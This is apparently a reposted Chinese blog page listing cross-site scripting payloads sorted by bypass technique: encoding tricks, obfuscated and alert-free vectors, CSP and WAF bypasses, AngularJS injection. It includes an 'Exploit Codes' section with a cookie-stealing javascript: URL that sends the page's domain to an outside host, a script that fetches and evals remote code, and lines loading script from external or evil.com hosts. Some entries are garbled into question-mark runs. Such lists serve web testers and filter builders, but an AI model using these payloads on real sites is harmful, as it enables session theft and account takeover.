奇技淫巧(全) - XSS payload

gclome

原文链接：奇技淫巧(全) - XSS payload


​

Blind XSS

1. https://xsshunter.com/

复制代码

Encoding

1. %u003Cscript%u003Eprompt%u0028303%u0029%u003C/script%u003E
   
2. %253Cscript%253Ealert(1)%253C%252Fscript%253E
   
3. %uff1cscript%uff1ealert(1);%uff1c/script%uff1e

复制代码

XML Based XSS

1. <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
   
2. <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>

复制代码

Where :// is required after protocol

1. javascript://%250aalert(1)

复制代码

XSS in email ID

1. ""><s>test"@gmail.com

复制代码

alert, prompt, confirm is not allowed

1. this[Object["keys"](this)[6]](1)
   
2. javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));
   
3. <script>eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));</script>
   
4. <svg/onload=t=/aler/.source+/t/.source;window.onerror/=window[t];throw+1;//
   
5. [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();//
   
6. []['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()
   
7. ([_,_____,_,_,__,___]=(__=[])+{___:__},[______,_,________,____,,_________,_______,__,,,__________]=[!!_____]+!_____+_____._____)[___+=_____+__________+__+______+_+________+___+______+_____+_][___](_________+_______+____+_+______+'(-~_____)')(__)
   
8. ([,?,,,,??]=[]+{},[???,????,?????,??????,,???????,????????,?????????,,,??????????]=[!!?]+!?+?.?)[??+=?+??????????+?????????+???+????+?????+??+???+?+????][??](???????+????????+??????+????+???+'`1`')

复制代码

Simple bypasses

1. <body onpageshow=alert(1)>
   
2. <k onsubmit=alert(1)>
   
3. <k oninput=alert(1)>
   
4. <style onload=alert(1)>
   
5. <html ontouchstart=alert(1)>MobileXSS
   
6. <marquee behavior="alternate" onstart=alert(1)>XSS</marquee>
   
7. <script/x>alert(1)</script/x>
   
8. <details ontoggle=alert()>
   
9. <SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
   
10. <SVG ONLOAD=alert(1)>
    
11. <a/href=//0>
    
12. <script src=//14.rs>
    
13. <base href=//evil.com>
    
14. " onfocus=alert(1) autofocus

复制代码

Obfuscated vectors

1. <imG/sRc=l oNerrOr=(prompt)() x>
   
2. <d3"<"/onclick="1>[confirm``]"<">XSS
   
3. <svg/x=">"/onload=confirm()//
   
4. <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
   
5. <svg </onload ="1> (_=prompt,_(1)) "">
   
6. <w="/x="y>"/ondblclick=`<`[confir\u006d``]>XXS
   
7. <A/iD=x hREf=jav        ascript:prom        pt(doc        ument.coo        kie); id=x>XSS

复制代码

Exploit Codes

1. <script>var xss = '';f=document.forms;for(i=0;i<f.length;i++){e=f[i].elements;for(n in e){if(e[n].type=='hidden'){alert(e[n].name+': '+e[n].value)}}};//'';</script>
   
2. Response on server ~
   
3. <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//127.0.0.1:8080");a.send();</script>
   
4. Cookie stealing with JS protocol ~
   
5. javascript:void(a='//127.0.0.1');void(b=document.domain);void(c=a.concat(b));void(window.location.assign(c));

复制代码

Javascript XSS

1. data:,alert(1)
   
2. \'-alert(1)//
   
3. '}alert(1);{'
   
4. '-alert()-'
   
5. '}alert(1)%0A{'
   
6. \'}alert(1);{//

复制代码

CSP Bypassed

1. <script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1></script> <embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch(e){alert(1)}//' allowscriptaccess=always>

复制代码

Angular JS

1. {{constructor.constructor('alert(1)')()}}
   
2. <x ng-app>{{constructor.constructor('alert(1)')()}}

复制代码

When Space and Slash doesnt work

1. <svgonload=alert(1)>

复制代码

Misc

1. <script ~~~>confirm(1)</script ~~~>
   
2. window+=valueOf=alert(1)
   
3. [cookie].some(alert)
   
4. "accesskey=X onclick=alert(1)+
   
5. -alert(1)//\ (quoteless xss inside js context when param is reflecting 2 times in same line)
   
6. <svg onload=setInterval`alert\x28document.domain\x29`>
   
7. (alert)(1)
   
8. a=alert,a(1)
   
9. [1].find(alert)
   
10. top["al"+"ert"](1)
    
11. top[/al/.source+/ert/.source](1)
    
12. al\u0065rt(1)
    
13. top['al\145rt'](1)
    
14. top[8680439..toString(30)](1)
    
15. <svg onload=alert(1)>
    
16. <svg onload=alert(1)>
    
17. <svg onload=alert(1)>
    
18. <svg onload=setInterval`alert\x28document.domain\x29`>
    
19. "><input type="submit" formaction="javascript:this['a'+'lert']`1`">
    
20. <body onfocus=alert(1)>
    
21. <object data=javascript:alert(1)>
    
22. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    
23. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    
24. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    
25. %253cscript%253ealert(document.cookie)%253c/script%253e
    
26. <audio/onloadstart=alert(1) src>
    
27. %u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
    
28. %uff1cscript%uff1ealert(1);%uff1c/script%uff1e
    
29. <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> akamai ghost wafbypass

复制代码